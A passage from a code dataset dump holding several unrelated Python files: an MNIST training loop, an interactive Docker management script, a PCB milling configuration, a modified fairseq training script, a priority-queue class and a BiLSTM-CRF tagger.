Change it so that\n    # the training and validation sets are disjoint and have the correct relative sizes.\n\n\n    train_loader = torch.utils.data.DataLoader(\n        train_dataset_augmented, batch_size=args.batch_size,\n        sampler=SubsetRandomSampler(subset_indices_train[:train_length])\n    )\n    val_loader = torch.utils.data.DataLoader(\n        train_dataset, batch_size=args.test_batch_size,\n        sampler=SubsetRandomSampler(subset_indices_valid)\n    )\n\n    # Load your model [fcNet, ConvNet, Net]\n    model = Net().to(device)\n\n    # Try different optimizers here [Adam, SGD, RMSprop]\n    optimizer = optim.Adadelta(model.parameters(), lr=args.lr)\n\n\n    # Set your learning rate scheduler\n    scheduler = StepLR(optimizer, step_size=args.step, gamma=args.gamma)\n\n    # Training loop\n    train_losses = []\n    test_losses = []\n    x = []\n    fig, ax = plt.subplots(1)\n\n\n    if True:\n        for epoch in range(1, args.epochs + 1):\n            #train and test each epoch\n            train_loss = train(args, model, device, train_loader, optimizer, epoch)\n            test_loss = test(model, device, val_loader)\n            scheduler.step()    # learning rate scheduler\n\n            train_losses.append(train_loss)\n            test_losses.append(test_loss)\n            x.append(epoch - 1)\n            ax.plot(x, test_losses, label='test_losses', markersize=2)\n            ax.plot(x, train_losses, label='train_losses', markersize=2)\n\n            plt.pause(0.05)\n\n            # You may optionally save your model at each epoch here\n\n    if args.save_model:\n\n        print(train_losses)\n        with open(\"train_losses_one.txt\", \"wb\") as fp:  # Pickling\n            pickle.dump(train_losses, fp)\n        print(test_losses)\n        with open(\"test_losses_one.txt\", \"wb\") as fp:  # Pickling\n            pickle.dump(test_losses, fp)\n\n\n\n        torch.save(model.state_dict(), \"mnist_model_onef.pt\")\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":22052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"539417910","text":"import subprocess as sp\n\ndef installDocker():\n    sp.run(\"yum install docker-ce --nobest -y\", shell=True)\n\ndef startDocker():\n    sp.run(\"systemctl start docker\",shell=True)\n\ndef dockerCommands():\n    ch = 'Y'\n    cnt = 0\n    while ch =='Y':\n        if cnt == 0:\n            ans = input(\"would you like to play with containers?[Y/N]\")\n            if ans == 'Y':\n                print(\"CHOOSE OPERATION: \")\n                print(\" 1 : RUN \")\n                print(\" 2 : STOP\")\n                print(\" 3 : REMOVE CONTAINER\")\n                print(\" 4 : REMOVE IMAGE\")\n                print(\" 5 : PULL IMAGE\")\n                print(\" 6 : Exit\")\n                opt = int(input())\n                if opt == 1:\n                    name = input(\"GIVE NAME TO YOUR CONTAINER: \")\n                    term = input(\"WOULD YOU LIKE TO GET INTERACTIVE TERMINAL OR CLOSE CONT AFTER RUNNING?[Y/N]\")\n                    image = input(\"IMAGE NAME : \")\n                    cont_run = sp.getoutput(\"docker run -dit --name {} {}\".format(name, image))\n                    print(cont_run)\n                    op_of_cont = sp.getoutput(\"docker ps\")\n                    print(op_of_cont)\n                elif opt == 2:\n                    all_cont = sp.getoutput(\"docker ps\")\n                    print(\"LIST OF CONTAINERS RUNNING\")\n                    print(all_cont)\n                    cont_name = input(\"ENTER THE NAME OF CONTAINER TO BE STOPPED: \")\n                    cont_stop = sp.getoutput(\"docker stop {}\".format(cont_name))\n                    print(cont_stop)\n                    clear = sp.run(\"clear\",shell=True)\n                    check_stop_cont = sp.getoutput(\"docker ps\")\n                    print(check_stop_cont)\n                elif opt == 3:\n                    all_cont = sp.getoutput(\"docker ps -a\")\n                    print(all_cont)\n                    rm_cont_name = input(\"IF ALL WANT TO REMOVE TYPE all or ENTER THE NAME OF CONTAINER TO BE REMOVED: \")\n                    if rm_cont_name == \"all\":\n                        rm_cont = sp.getoutput(\"docker rm `docker ps -a`\")\n                    else:\n                        rm_cont = sp.getoutput(\"docker 
rm {}\".format(rm_cont_name))\n                    print(rm_cont)\n                    check_rm_cont = sp.getoutput(\"docker ps -a\")\n                    print(check_rm_cont)\n                elif opt == 4:\n                    all_img = sp.getoutput(\"docker images\")\n                    print(all_img)\n                    rm_img_name = input(\"IF ALL WANT TO REMOVE TYPE all OR ENTER NAME OF IMAGE TO BE DELETED: \")\n                    if rm_img_name == \"all\":\n                        rm_img = sp.getoutput(\"docker rmi `docker images -q` --force\")\n                    else:\n                        rm_img = sp.getoutput(\"docker rmi {}\".format(rm_img_name))\n                    print(rm_img)\n                    check_rm_img = sp.getoutput(\"docker images\")\n                    print(check_rm_img)\n                elif opt == 5:\n                    all_img_present = sp.getoutput(\"docker images\")\n                    print(\"LIST OF ALL IMAGES PRESENT\")\n                    print(all_img_present)\n                    pull_img_name = input(\"ENTER NAME OF IMAGE TO BE PULLED: \")\n                    pull_img = sp.getoutput(\"docker pull {}\".format(pull_img_name))\n                    print(pull_img)\n                    check_pull_img = sp.getoutput(\"docker images\")\n                    print(check_pull_img)\n                elif opt == 6:\n                    break\n                ch = input(\"WOULD YOU LIKE TO CONTINUE?[Y/N]: \")\n                if ch != 'Y':\n                    break\n                cnt+=1\n        else:\n            break","sub_path":"linuxAutomation/docker.py","file_name":"docker.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"117032201","text":"#Tue Sep 10 16:06:10 EST 2013\nN_copies_Y=2\nN_copies_X=2\nZ_origin_offset=0\nshowEtch3=0\nshowEtch2=0\nshowEtch=1\nGRID_N_POINTS=(4,4)\nBAUDRATE=115200\nminDistance=0.001**2 \nmaxDistance=1**2 \nZlift_milling=1.0\nfilePath=\"C:/temp/out/\"\nF_fastMove=70000\nEmulate=True\nrunInGui=True\nshowDrill=0\nF_slowMove=20000\nfavouritesPath=\"C:/Users/dutoitk.FLITECH/Dropbox/Cyclone-PCB-Factory-master/favourites/\"\nZ_PROBING_FILE=\"Z_probing_data.p\"\nmargin_copies_Y=5\ninitial_Z_lowering_distance=-5\nDEVICE=\"COM3\"\nmargin_copies_X=5\nshowEdge=0\nZ_global_offset=0\nZlift=0.5\nfileName=\"Encoder_Board\"\n","sub_path":"Software/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"434077532","text":"#!/usr/bin/env python3 -u\n# Copyright (c) 2017-present, Facebook, Inc.\n# All rights reserved.\n#\n# This source code is licensed under the license found in the LICENSE file in\n# the root directory of this source tree. 
An additional grant of patent rights\n# can be found in the PATENTS file in the same directory.\n\"\"\"\nTrain a new model on one or across multiple GPUs.\n\"\"\"\n\nimport collections\nimport math\nimport os\nimport random\nimport torch\nimport subprocess\nimport re\nimport copy\nfrom fairseq import checkpoint_utils, distributed_utils, options, progress_bar, tasks, utils, bleu\nfrom fairseq.data import iterators\nfrom fairseq.trainer import Trainer\nfrom fairseq.meters import AverageMeter, StopwatchMeter\nimport numpy as np\n\n\ndef main(args, init_distributed=False):\n utils.import_user_module(args)\n\n assert args.max_tokens is not None or args.max_sentences is not None, \\\n 'Must specify batch size either with --max-tokens or --max-sentences'\n\n # Initialize CUDA and distributed training\n if torch.cuda.is_available() and not args.cpu:\n torch.cuda.set_device(args.device_id)\n torch.manual_seed(args.seed)\n if init_distributed:\n args.distributed_rank = distributed_utils.distributed_init(args)\n\n # Print args\n print(args)\n\n # Setup task, e.g., translation, language modeling, etc.\n task = tasks.setup_task(args)\n\n # Load valid dataset (we load training data below, based on the latest checkpoint)\n for valid_sub_split in args.valid_subset.split(','):\n task.load_dataset(valid_sub_split, combine=True, epoch=0)\n\n # Build model and criterion\n model = task.build_model(args)\n criterion = task.build_criterion(args)\n print(model)\n print('| model {}, criterion {}'.format(args.arch, criterion.__class__.__name__))\n print('| num. model params: {} (num. trained: {})'.format(\n sum(p.numel() for p in model.parameters()),\n sum(p.numel() for p in model.parameters() if p.requires_grad),\n ))\n\n # added by wxjiao: load bilingual pairs\n src_dict = task.source_dictionary.__dict__['indices']\n tgt_dict = task.target_dictionary.__dict__['indices']\n slang, tlang = args.source_lang, args.target_lang\n st_path = 'bildict/{}-{}/{}-{}.align.txt'.format(slang, tlang, slang, tlang)\n st_aligners, st_prob = get_stpairs(st_path, src_dict, tgt_dict, alpha=0.75) # LongTensor\n print('| bilingual pairs {}; top-5 probs {}'.format(st_aligners.shape[0], st_prob[:5]))\n\n\n # Build trainer\n trainer = Trainer(args, task, model, criterion)\n print('| training on {} GPUs'.format(args.distributed_world_size))\n print('| max tokens per GPU = {} and max sentences per GPU = {}'.format(\n args.max_tokens,\n args.max_sentences,\n ))\n\n #slhe, added for generation\n assert not args.sampling or args.nbest == args.beam, \\\n '--sampling requires --nbest to be equal to --beam'\n assert args.replace_unk is None or args.raw_text, \\\n '--replace-unk requires a raw text dataset (--raw-text)'\n # assert args.gen_subset\n # task.load_dataset(args.gen_subset)\n\n # Load the latest checkpoint if one is available and restore the\n # corresponding train iterator\n extra_state, epoch_itr = checkpoint_utils.load_checkpoint(args, trainer)\n\n # by wxjiao\n print('| Truly trained num. 
model params: {}'.format(\n sum(p.numel() for p in trainer.model.parameters() if p.requires_grad)))\n\n # Train until the learning rate gets too small\n max_epoch = args.max_epoch or math.inf\n max_update = args.max_update or math.inf\n lr = trainer.get_lr()\n train_meter = StopwatchMeter()\n train_meter.start()\n valid_losses = [None]\n valid_subsets = args.valid_subset.split(',')\n while lr > args.min_lr and epoch_itr.epoch < max_epoch and trainer.get_num_updates() < max_update:\n # train for one epoch\n train(args, trainer, task, epoch_itr, st_aligners, st_prob)\n\n if not args.disable_validation and epoch_itr.epoch % args.validate_interval == 0:\n valid_losses = validate(args, trainer, task, epoch_itr, valid_subsets)\n else:\n valid_losses = [None]\n\n # only use first validation loss to update the learning rate\n lr = trainer.lr_step(epoch_itr.epoch, valid_losses[0])\n\n # save checkpoint\n if epoch_itr.epoch % args.save_interval == 0:\n checkpoint_utils.save_checkpoint(args, trainer, epoch_itr, valid_losses[0])\n\n if ':' in getattr(args, 'data', ''):\n # sharded data: get train iterator for next epoch\n epoch_itr = trainer.get_train_iterator(epoch_itr.epoch)\n train_meter.stop()\n print('| done training in {:.1f} seconds'.format(train_meter.sum))\n\n\n# added by wxjiao: get the biligual pairs\ndef get_stpairs(st_path, src_dict, tgt_dict, alpha=1.0):\n st_aligners = []\n s_prob = []\n t_prob = []\n with open(st_path, 'r') as f:\n for line in f:\n src_l, tgt_l, ps_l, pt_l = line.strip('\\n').split(' ')\n if src_l in src_dict and tgt_l in tgt_dict:\n st_aligners.append([src_dict[src_l], tgt_dict[tgt_l]])\n s_prob.append(int(ps_l))\n t_prob.append(int(pt_l))\n st_aligners = np.array(st_aligners, dtype=int)\n s_prob = np.array(s_prob, dtype=float)\n s_prob = s_prob ** alpha / np.sum(s_prob ** alpha, axis=0, keepdims=True)\n t_prob = np.array(t_prob, dtype=float)\n t_prob = t_prob ** alpha / np.sum(t_prob ** alpha, axis=0, keepdims=True)\n st_prob = (s_prob * t_prob)**0.5\n st_prob = st_prob / np.sum(st_prob)\n return st_aligners, st_prob\n\n\n#def train(args, trainer, task, epoch_itr, st_aligners):\n# modified by wxjiao: add one more arg -- st_aligners\ndef train(args, trainer, task, epoch_itr, st_aligners, st_prob):\n \"\"\"Train the model for one epoch.\"\"\"\n # Update parameters every N batches\n update_freq = args.update_freq[epoch_itr.epoch - 1] \\\n if epoch_itr.epoch <= len(args.update_freq) else args.update_freq[-1]\n\n # Initialize data iterator\n itr = epoch_itr.next_epoch_itr(\n fix_batches_to_gpus=args.fix_batches_to_gpus,\n shuffle=(epoch_itr.epoch >= args.curriculum),\n )\n itr = iterators.GroupedIterator(itr, update_freq)\n progress = progress_bar.build_progress_bar(\n args, itr, epoch_itr.epoch, no_progress_bar='simple',\n )\n\n extra_meters = collections.defaultdict(lambda: AverageMeter())\n valid_subsets = args.valid_subset.split(',')\n max_update = args.max_update or math.inf\n\n # added by wxjiao\n K_buf = 1 # lambda 36.0\n sample_buf = []\n for i, samples in enumerate(progress, start=epoch_itr.iterations_in_epoch):\n #log_output = trainer.train_step(samples)\n # modified by wxjiao: add one more arg -- st_aligners\n log_output = trainer.train_step(samples, st_aligners, st_prob, sample_buf, K_buf)\n if log_output is None:\n continue\n\n # log mid-epoch stats\n stats = get_training_stats(trainer)\n for k, v in log_output.items():\n if k in ['loss', 'nll_loss', 'ntokens', 'nsentences', 'sample_size', 'sample_status']:\n continue # these are already logged above\n if 
'loss' in k:\n extra_meters[k].update(v, log_output['sample_size'])\n else:\n extra_meters[k].update(v)\n stats[k] = extra_meters[k].avg\n progress.log(stats, tag='train', step=stats['num_updates'])\n\n # ignore the first mini-batch in words-per-second calculation\n if i == 0:\n trainer.get_meter('wps').reset()\n\n num_updates = trainer.get_num_updates()\n if (\n not args.disable_validation\n and args.save_interval_updates > 0\n and num_updates % args.save_interval_updates == 0\n and num_updates > 0\n ):\n valid_losses = validate(args, trainer, task, epoch_itr, valid_subsets)\n checkpoint_utils.save_checkpoint(args, trainer, epoch_itr, valid_losses[0])\n print(\"dictionary size is {}, {}\".format(len(task.source_dictionary), len(task.target_dictionary)))\n if num_updates >= max_update:\n break\n\n # log end-of-epoch stats\n stats = get_training_stats(trainer)\n for k, meter in extra_meters.items():\n stats[k] = meter.avg\n progress.print(stats, tag='train', step=stats['num_updates'])\n\n # reset training meters\n for k in [\n 'train_loss', 'train_nll_loss', 'wps', 'ups', 'wpb', 'bsz', 'gnorm', 'clip',\n ]:\n meter = trainer.get_meter(k)\n if meter is not None:\n meter.reset()\n\ndef get_training_stats(trainer):\n stats = collections.OrderedDict()\n stats['loss'] = trainer.get_meter('train_loss')\n if trainer.get_meter('train_nll_loss').count > 0:\n nll_loss = trainer.get_meter('train_nll_loss')\n stats['nll_loss'] = nll_loss\n else:\n nll_loss = trainer.get_meter('train_loss')\n stats['ppl'] = utils.get_perplexity(nll_loss.avg)\n stats['wps'] = trainer.get_meter('wps')\n stats['ups'] = trainer.get_meter('ups')\n stats['wpb'] = trainer.get_meter('wpb')\n stats['bsz'] = trainer.get_meter('bsz')\n stats['num_updates'] = trainer.get_num_updates()\n stats['lr'] = trainer.get_lr()\n stats['gnorm'] = trainer.get_meter('gnorm')\n stats['clip'] = trainer.get_meter('clip')\n stats['oom'] = trainer.get_meter('oom')\n if trainer.get_meter('loss_scale') is not None:\n stats['loss_scale'] = trainer.get_meter('loss_scale')\n stats['wall'] = round(trainer.get_meter('wall').elapsed_time)\n stats['train_wall'] = trainer.get_meter('train_wall')\n return stats\n\n\ndef validate(args, trainer, task, epoch_itr, subsets):\n \"\"\"Evaluate the model on the validation set(s) and return the losses.\"\"\"\n valid_losses = []\n valid_bleus = []\n for subset in subsets:\n # Initialize data iterator\n\n if args.sacrebleu:\n scorer = bleu.SacrebleuScorer()\n else:\n tgt_dict = task.target_dictionary\n scorer = bleu.Scorer(tgt_dict.pad(), tgt_dict.eos(), tgt_dict.unk())\n\n src_dict_dup, tgt_dict_dup = task.dict_dup()\n\n itr = task.get_batch_iterator(\n dataset=task.dataset(subset),\n max_tokens=args.max_tokens,\n max_sentences=args.max_sentences_valid,\n max_positions=utils.resolve_max_positions(\n task.max_positions(),\n trainer.get_model().max_positions(),\n ),\n ignore_invalid_inputs=args.skip_invalid_size_inputs_valid_test,\n required_batch_size_multiple=args.required_batch_size_multiple,\n seed=args.seed,\n num_shards=args.distributed_world_size,\n shard_id=args.distributed_rank,\n num_workers=args.num_workers,\n ).next_epoch_itr(shuffle=False)\n\n progress = progress_bar.build_progress_bar(\n args, itr, epoch_itr.epoch,\n prefix='valid on \\'{}\\' subset'.format(subset),\n no_progress_bar='simple'\n )\n\n # reset validation loss meters\n for k in ['valid_loss', 'valid_nll_loss', 'valid_bleu']:\n meter = trainer.get_meter(k)\n if meter is not None:\n meter.reset()\n extra_meters = collections.defaultdict(lambda: 
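\n            # the factory builds a fresh AverageMeter the first time each metric key is accessed\n            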
AverageMeter())\n\n        all_generation_output = []\n        #import time; t1 = time.time()\n        #print(\"start validation on {} data with {} batch\".format(subset, len(itr))\n        count = 0\n        for sample in progress:\n            #count+=1\n            #if count%100 == 0:\n            #    print(\"batch: \", count)\n            log_output, generation_output = trainer.valid_step(sample, src_dict_dup, tgt_dict_dup, scorer=scorer)\n            all_generation_output.append(generation_output)\n            for k, v in log_output.items():\n                if k in ['loss', 'nll_loss', 'ntokens', 'nsentences', 'sample_size', 'sample_status']:\n                    continue\n                extra_meters[k].update(v)\n        #print(\"finish validation using {} seconds\".format(time.time()-t1))\n        if len(all_generation_output) != 0:\n            all_generation_output = [gen for gen_list in all_generation_output for gen in gen_list]\n            print(\"| Evaluate {} samples from {} data\".format(len(all_generation_output), subset))\n            print(\"| {}\".format(scorer.result_string()))\n            if args.distributed_rank == 0:\n                gene_save_dir = save_gene_file(args, all_generation_output, trainer, epoch_itr)\n                bleu_res = external_eval(gene_save_dir, multi_ref=False)\n                # log validation stats\n                trainer.get_meter('valid_bleu').update(bleu_res)\n        stats = get_valid_stats(trainer)\n        for k, meter in extra_meters.items():\n            stats[k] = meter.avg\n        stats['bleu'] = stats['bleu'].avg\n        progress.print(stats, tag=subset, step=trainer.get_num_updates())\n        valid_losses.append(stats['loss'].avg)\n        scorer.reset()\n\n    return valid_losses\n\ndef external_eval(gene_save_dir, multi_ref=False):\n    print(\"| Evaluate using external metric\")\n    hypo_path = gene_save_dir + 'hypo.txt'\n    if multi_ref:\n        raise NotImplementedError\n    else:\n        target_path = gene_save_dir + 'target.txt'\n        eval_cmd = \"perl ./scripts/multi-bleu.perl %s < %s\"%(target_path, hypo_path)\n        # print(eval_cmd)\n    output = subprocess.check_output(eval_cmd, shell=True).decode(\"utf-8\")\n    print(\"| \" + output)\n    p = re.compile(\"BLEU = \\d+\\.\\d+,\")\n    bleu_res = float(p.search(output).group(0).replace(',', '').replace('BLEU = ', ''))\n    return bleu_res\n\ndef save_gene_file(args, generation_list, trainer, epoch_itr):\n    if args.results_path is not None:\n        epoch = epoch_itr.epoch\n        end_of_epoch = epoch_itr.end_of_epoch()\n        updates = trainer.get_num_updates()\n\n        gene_folder = 'gene/'\n        save_folder = os.path.join(args.results_path, gene_folder)\n        if not os.path.exists(save_folder):\n            os.makedirs(save_folder, exist_ok=True)\n\n        if end_of_epoch and not args.no_epoch_checkpoints and epoch % args.save_interval == 0:\n            file_prefix = 'trans_cp_{}_'.format(epoch)\n        elif not end_of_epoch and args.save_interval_updates > 0 and updates % args.save_interval_updates == 0:\n            file_prefix = 'trans_cp_{}_{}_'.format(epoch, updates)\n        else:\n            raise NotImplementedError\n\n        save_dir = os.path.join(save_folder, file_prefix)\n        print('| Save generation results into path %s' % save_dir)\n    else:\n        print('Save path is not specified, will not save the generation results')\n        return\n    hypo_file_path = save_dir + 'hypo.txt'\n    target_file_path = save_dir + 'target.txt'\n    hypo_file = open(hypo_file_path, 'w')\n    target_file = open(target_file_path, 'w')\n\n    generation_list.sort(key=lambda x: x[0])  # sort in place; a bare sorted() call discarded its result\n    for item in generation_list:\n        hypo_file.write(item[1] + '\\n')\n        target_file.write(item[2] + '\\n')\n    hypo_file.close()\n    target_file.close()\n    return save_dir\n\ndef get_valid_stats(trainer):\n    stats = collections.OrderedDict()\n    stats['loss'] = trainer.get_meter('valid_loss')\n    stats['bleu'] = trainer.get_meter('valid_bleu')\n    if trainer.get_meter('valid_nll_loss').count > 
0:\n nll_loss = trainer.get_meter('valid_nll_loss')\n stats['nll_loss'] = nll_loss\n else:\n nll_loss = stats['loss']\n stats['ppl'] = utils.get_perplexity(nll_loss.avg)\n stats['num_updates'] = trainer.get_num_updates()\n if hasattr(checkpoint_utils.save_checkpoint, 'best'):\n stats['best_loss'] = min(\n checkpoint_utils.save_checkpoint.best, stats['loss'].avg)\n return stats\n\n\ndef distributed_main(i, args, start_rank=0):\n args.device_id = i\n if args.distributed_rank is None: # torch.multiprocessing.spawn\n args.distributed_rank = start_rank + i\n main(args, init_distributed=True)\n\n\ndef cli_main():\n parser = options.get_training_parser()\n args = options.parse_args_and_arch(parser)\n\n if args.distributed_init_method is None:\n distributed_utils.infer_init_method(args)\n\n if args.distributed_init_method is not None:\n # distributed training\n if torch.cuda.device_count() > 1 and not args.distributed_no_spawn:\n start_rank = args.distributed_rank\n args.distributed_rank = None # assign automatically\n torch.multiprocessing.spawn(\n fn=distributed_main,\n args=(args, start_rank),\n nprocs=torch.cuda.device_count(),\n )\n else:\n distributed_main(args.device_id, args)\n elif args.distributed_world_size > 1:\n # fallback for single node with multiple GPUs\n assert args.distributed_world_size <= torch.cuda.device_count()\n port = random.randint(10000, 20000)\n args.distributed_init_method = 'tcp://localhost:{port}'.format(port=port)\n args.distributed_rank = None # set based on device id\n if max(args.update_freq) > 1 and args.ddp_backend != 'no_c10d':\n print('| NOTE: you may get better performance with: --ddp-backend=no_c10d')\n torch.multiprocessing.spawn(\n fn=distributed_main,\n args=(args, ),\n nprocs=args.distributed_world_size,\n )\n else:\n # single GPU training\n main(args)\n\n\nif __name__ == '__main__':\n cli_main()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":17489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"428091064","text":"import heapq as hpq\nimport itertools\n\n\nclass PriorityQueueSet:\n \"\"\"\n Combined priority queue and set data structure.\n\n The dictionary wrapper guarantees:\n - a unique set of items\n - the possibility to search for items\n\n and as a result:\n - the possibility to update the priority of an already existing item\n\n\n Provides O(1) membership test, O(log N) insertion and O(log N) removal of the smallest item.\n\n Important: the items of this data structure must be both comparable and\n hashable (i.e. must implement __cmp__ and __hash__). This is true of\n Python's built-in objects, but you should implement those methods if you\n want to use the data structure for custom objects.\n \"\"\"\n\n # placeholder for a removed task\n REMOVED = '<removed-task>'\n\n def __init__(self, items=None):\n \"\"\"\n Create a new PriorityQueueSet.\n\n Arguments:\n items (list): An initial item list - it can be unsorted and\n non-unique. 
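Duplicate input items are collapsed automatically because they become dictionary keys. 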
The data structure will be created in O(N).\n\n Attributes:\n self.set: dictionary wrapper for the heap\n self.heap: the actual priority queue\n self.counter: unique sequence count\n \"\"\"\n\n if items is None:\n items = []\n self.set = dict((item, []) for item in items)\n self.heap = list(self.set.keys())\n hpq.heapify(self.heap)\n self.counter = itertools.count()\n\n def has_item(self, item):\n \"\"\"Check if ``item`` exists in the queue.\"\"\"\n return item in self.set\n\n def get_priority(self, item):\n \"\"\"Get the priority of ``item`` if it exists.\"\"\"\n try:\n return self.set[item][0]\n except KeyError:\n print(\"Can't get priority of non-existing item\")\n\n def pop(self):\n \"\"\"Remove and return the lowest priority task. Raise KeyError if empty.\"\"\"\n while self.heap:\n priority, count, smallest = hpq.heappop(self.heap)\n if smallest is not self.REMOVED:\n del self.set[smallest]\n return priority, smallest\n raise KeyError('pop from an empty priority queue')\n\n def remove(self, item):\n \"\"\"Mark an existing task as REMOVED.\"\"\"\n try:\n entry = self.set.pop(item)\n entry[-1] = self.REMOVED\n except KeyError:\n print(\"Can't remove a non-existing item\")\n\n def add(self, item, priority=0):\n \"\"\"Add a new item or update the priority of an existing task\"\"\"\n if item in self.set:\n self.remove(item)\n count = next(self.counter)\n entry = [priority, count, item]\n self.set[item] = entry\n hpq.heappush(self.heap, entry)\n","sub_path":"taquin/algorithm/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"35667840","text":"import tensorflow as tf\nimport numpy as np\nfrom lavd.shares import BaseModel, BiRNN, CharCNNHW, CRF, Embedding\nfrom utils.logger import Progbar\n\n\nclass BiLSTMCRFModel(BaseModel):\n def __init__(self, config):\n super(BiLSTMCRFModel, self).__init__(config)\n self._init_configs()\n with tf.Graph().as_default():\n self._add_placeholders()\n self._build_model()\n self.logger.info(\"total params: {}\".format(self.count_params()))\n self._initialize_session()\n\n def _init_configs(self):\n vocab = self.load_dataset(self.cfg.vocab)\n self.word_dict, self.char_dict, self.label_dict = vocab[\"word_dict\"], vocab[\"char_dict\"], vocab[\"label_dict\"]\n del vocab\n self.word_size, self.char_size, self.label_size = len(self.word_dict), len(self.char_dict), len(self.label_dict)\n self.rev_word_dict = dict([(idx, word) for word, idx in self.word_dict.items()])\n self.rev_char_dict = dict([(idx, char) for char, idx in self.char_dict.items()])\n self.rev_label_dict = dict([(idx, tag) for tag, idx in self.label_dict.items()])\n\n def _get_feed_dict(self, data, is_train=False, lr=None):\n feed_dict = {self.words: data[\"words\"], self.seq_len: data[\"seq_len\"], self.chars: data[\"chars\"],\n self.char_seq_len: data[\"char_seq_len\"]}\n if \"labels\" in data:\n feed_dict[self.labels] = data[\"labels\"]\n feed_dict[self.is_train] = is_train\n if lr is not None:\n feed_dict[self.lr] = lr\n return feed_dict\n\n def _add_placeholders(self):\n self.words = tf.placeholder(tf.int32, shape=[None, None], name=\"words\")\n self.seq_len = tf.placeholder(tf.int32, shape=[None], name=\"seq_len\")\n self.chars = tf.placeholder(tf.int32, shape=[None, None, None], name=\"chars\")\n self.char_seq_len = tf.placeholder(tf.int32, shape=[None, None], name=\"char_seq_len\")\n self.labels = tf.placeholder(tf.int32, shape=[None, None], name=\"labels\")\n # 
hyper-parameters\n self.is_train = tf.placeholder(tf.bool, shape=[], name=\"is_train\")\n self.lr = tf.placeholder(tf.float32, name=\"learning_rate\")\n\n def _build_model(self):\n with tf.variable_scope(\"embeddings_op\"):\n # word table\n word_table = Embedding(self.word_size, self.cfg.word_dim, self.cfg.wordvec, self.cfg.tune_emb,\n self.cfg.word_project, scope=\"word_table\")\n word_emb = word_table(self.words)\n # char table\n char_table = Embedding(self.char_size, self.cfg.char_dim, None, True, False, scope=\"char_table\")\n char_emb = char_table(self.chars)\n\n with tf.variable_scope(\"computation_graph\"):\n # create module\n emb_dropout = tf.layers.Dropout(rate=self.cfg.emb_drop_rate)\n rnn_dropout = tf.layers.Dropout(rate=self.cfg.rnn_drop_rate)\n char_tdnn_hw = CharCNNHW(self.cfg.char_kernels, self.cfg.char_kernel_features, self.cfg.char_dim,\n self.cfg.highway_layers, padding=\"VALID\", activation=tf.nn.tanh, use_bias=True,\n hw_activation=tf.nn.tanh, reuse=False, scope=\"char_tdnn_hw\")\n bi_rnn = BiRNN(self.cfg.num_units, concat=self.cfg.concat_rnn, reuse=tf.AUTO_REUSE, scope=\"bi_rnn\")\n crf_layer = CRF(self.label_size, reuse=False, scope=\"crf\")\n\n # compute logits\n char_cnn = char_tdnn_hw(char_emb)\n emb = emb_dropout(tf.concat([word_emb, char_cnn], axis=-1), training=self.is_train)\n rnn_outputs, _ = bi_rnn(emb, self.seq_len)\n rnn_outputs = rnn_dropout(rnn_outputs, training=self.is_train)\n self.logits, self.transition, self.loss = crf_layer(rnn_outputs, self.labels, self.seq_len)\n\n optimizer = self._build_optimizer()\n if self.cfg.grad_clip is not None and self.cfg.grad_clip > 0:\n grads, vs = zip(*optimizer.compute_gradients(self.loss))\n grads, _ = tf.clip_by_global_norm(grads, self.cfg.grad_clip)\n self.train_op = optimizer.apply_gradients(zip(grads, vs))\n else:\n self.train_op = optimizer.minimize(self.loss)\n\n def _predict_op(self, data):\n feed_dict = self._get_feed_dict(data)\n logits, transition, seq_len = self.sess.run([self.logits, self.transition, self.seq_len], feed_dict=feed_dict)\n return self.viterbi_decode(logits, transition, seq_len)\n\n def train(self, dataset):\n self.logger.info(\"Start training...\")\n best_f1, no_imprv_epoch, init_lr, lr, cur_step = -np.inf, 0, self.cfg.lr, self.cfg.lr, 0\n for epoch in range(1, self.cfg.epochs + 1):\n self.logger.info(\"Epoch {}/{}:\".format(epoch, self.cfg.epochs))\n prog = Progbar(target=dataset.get_num_batches())\n for i, data in enumerate(dataset.get_data_batches()):\n cur_step += 1\n feed_dict = self._get_feed_dict(data, is_train=True, lr=lr)\n _, train_loss = self.sess.run([self.train_op, self.loss], feed_dict=feed_dict)\n prog.update(i + 1, [(\"Global Step\", int(cur_step)), (\"Train Loss\", train_loss)])\n # learning rate decay\n if self.cfg.use_lr_decay:\n if self.cfg.decay_step:\n lr = max(init_lr / (1.0 + self.cfg.lr_decay * epoch / self.cfg.decay_step), self.cfg.minimal_lr)\n # evaluate\n score = self.evaluate(dataset.get_data_batches(\"dev\"), name=\"dev\")\n self.evaluate(dataset.get_data_batches(\"test\"), name=\"test\")\n if score[\"FB1\"] > best_f1:\n best_f1, no_imprv_epoch = score[\"FB1\"], 0\n self.save_session(epoch)\n self.logger.info(\" -- new BEST score on dev dataset: {:04.2f}\".format(best_f1))\n else:\n no_imprv_epoch += 1\n if self.cfg.no_imprv_tolerance is not None and no_imprv_epoch >= self.cfg.no_imprv_tolerance:\n self.logger.info(\"early stop at {}th epoch without improvement\".format(epoch))\n self.logger.info(\"best score on dev set: {}\".format(best_f1))\n break\n\n def 
